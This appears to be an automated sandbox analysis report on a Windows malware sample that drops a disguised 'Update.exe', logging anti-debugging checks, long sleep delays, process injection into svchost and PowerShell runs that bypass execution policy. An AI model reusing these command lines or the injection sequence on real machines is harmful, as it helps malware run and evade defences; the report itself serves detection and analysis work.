Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\Public\Bilite\Axialis\Update.exe	Window / User API: threadDelayed 5869	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3806	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 647	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8185	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1414	Jump to behavior

Source: C:\Users\user\Desktop\Uulw5M1DfU.exe	Dropped PE file which has not been started: C:\Users\Public\Bilite\ldplayer9_ld_6000_ld.exe			Jump to dropped file
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\backup.dll			Jump to dropped file

Source: C:\Users\Public\Bilite\Axialis\Update.exe TID: 5780	Thread sleep time: -73000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe TID: 4996	Thread sleep time: -63000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe TID: 6176	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe TID: 3620	Thread sleep count: 299 > 30	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe TID: 5368	Thread sleep count: 5869 > 30	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe TID: 5368	Thread sleep time: -58690s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 5900	Thread sleep count: 269 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 348	Thread sleep count: 3806 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2368	Thread sleep count: 647 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5184	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3684	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4088	Thread sleep count: 8185 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2792	Thread sleep count: 1414 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 824	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 4504	Thread sleep count: 268 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 2568	Thread sleep count: 263 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 6584	Thread sleep count: 141 > 30

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Last function: Thread delayed
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\timeout.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\timeout.exe	Last function: Thread delayed

Source: C:\Users\Public\Bilite\Axialis\Update.exe

Thread sleep count: Count: 5869 delay: -10

Jump to behavior

Source: C:\Users\Public\Bilite\Axialis\Update.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\Uulw5M1DfU.exe	Code function: 0_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,	0_2_0040301A
Source: C:\Users\user\Desktop\Uulw5M1DfU.exe	Code function: 0_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,	0_2_00402B79
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_6CAAF888 FindFirstFileExW,RevokeDragDrop,FindNextFileW,FindClose,FindClose,	3_2_6CAAF888
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_6CAAF7D7 FindFirstFileExW,	3_2_6CAAF7D7

Source: C:\Users\Public\Bilite\Axialis\Update.exe

Code function: 3_2_037F80F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,

3_2_037F80F0

Source: C:\Users\Public\Bilite\Axialis\Update.exe

Code function: 3_2_037F5430 _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,

3_2_037F5430

Source: C:\Users\Public\Bilite\Axialis\Update.exe	Thread delayed: delay time: 73000	Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: powershell.exe, 00000012.00000002.2562549709.0000000004CB6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000012.00000002.2562549709.0000000004CB6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000012.00000002.2561569868.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: .0 $tVmNetworkAdPSDscXMachine.psm1l
Source: powershell.exe, 00000012.00000002.2561569868.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PEventVmNetwoPSDesiredStateConfiguration.types.ps1xml
Source: powershell.exe, 00000012.00000002.2562549709.0000000004CB6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: Update.exe, 00000003.00000003.2840513111.0000000000895000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000002.3509713615.0000000000896000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\Public\Bilite\Axialis\Update.exe

API call chain: ExitProcess graph end node

graph_3-70288

Source: C:\Users\Public\Bilite\Axialis\Update.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\Public\Bilite\Axialis\Update.exe

Code function: 3_2_006E15D0 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

3_2_006E15D0

Source: C:\Users\Public\Bilite\Axialis\Update.exe

Code function: 3_2_0380054D VirtualProtect ?,-00000001,00000104,?

3_2_0380054D

Source: C:\Users\user\Desktop\Uulw5M1DfU.exe

Code function: 0_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow,

0_2_00406D5D

Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_00C70AE4 mov eax, dword ptr fs:[00000030h]		3_2_00C70AE4
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_036700CD mov eax, dword ptr fs:[00000030h]		3_2_036700CD

Source: C:\Users\Public\Bilite\Axialis\Update.exe

Code function: 3_2_037F6790 wsprintfW,GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,LookupAccountSidW,GetLastError,GetProcessHeap,HeapFree,

3_2_037F6790

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug

Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_006E1764 SetUnhandledExceptionFilter,	3_2_006E1764
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_006E15D0 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_006E15D0
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_006E1A8F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_006E1A8F
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_037FDF10 Sleep,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,EnumWindows,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,Sleep,RegOpenKeyExW,RegQueryValueExW,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,	3_2_037FDF10
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_037FF00A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_037FF00A
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_03801F67 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_03801F67
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_6CA9C85A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6CA9C85A
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_6CAA3AAF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6CAA3AAF
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_6CA9C4ED SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_6CA9C4ED
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_10006815 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_10006815
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_10008587 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_10008587
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_00C767EC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00C767EC

HIPS / PFW / Operating System Protection Evasion

Bypasses PowerShell execution policy

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1

Contains functionality to inject code into remote processes

Source: C:\Users\Public\Bilite\Axialis\Update.exe

Code function: 3_2_037F77E0 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread,

3_2_037F77E0

Contains functionality to inject threads in other processes

Source: C:\Users\Public\Bilite\Axialis\Update.exe

3_2_037F77E0

Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\SysWOW64\svchost.exe		3_2_037F77E0
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\System32\svchost.exe		3_2_037F77E0

Source: C:\Users\user\Desktop\Uulw5M1DfU.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\Update.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\Bilite\Axialis\Update.exe C:\Users\Public\Bilite\Axialis\Update.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1	Jump to behavior

Source: Update.exe, 00000003.00000003.3003485617.0000000004821000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000003.3490479814.0000000004821000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000003.2842291150.0000000004821000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 0 minProgram Manager
Source: Update.exe, 00000003.00000002.3511507592.0000000004821000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: inProgram Manager
Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.dr	Binary or memory string: .lnkutility::usystem::resolveShortcutFromFileresolveShortcutFromFile buffer is too smallShell_TrayWndnot traywndutility::usystem::getSystBarHeightit is pcutility::usystem::isNoteBookPCit is notebookutility::usystem::isNoteBookPCShcore.dllGetDpiForMonitorldenvAccept: /

Source: C:\Users\user\Desktop\Uulw5M1DfU.exe

Code function: 0_2_0040D72E cpuid

0_2_0040D72E

Source: C:\Users\user\Desktop\Uulw5M1DfU.exe	Code function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,	0_2_00401F9D
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,	3_2_037F5430
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: EnumSystemLocalesW,	3_2_6CAACEBE
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_6CAB68D3
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: GetLocaleInfoW,	3_2_6CAB682C
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: GetLocaleInfoW,	3_2_6CAAC9C3
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: GetLocaleInfoW,	3_2_6CAB69D9
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	3_2_6CAB645A
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: EnumSystemLocalesW,	3_2_6CAB66AD
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: EnumSystemLocalesW,	3_2_6CAB67E1
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: GetLocaleInfoW,	3_2_6CAB670C
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	3_2_6CAB616E
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: EnumSystemLocalesW,	3_2_6CAB63BF

Source: C:\Users\Public\Bilite\Axialis\Update.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
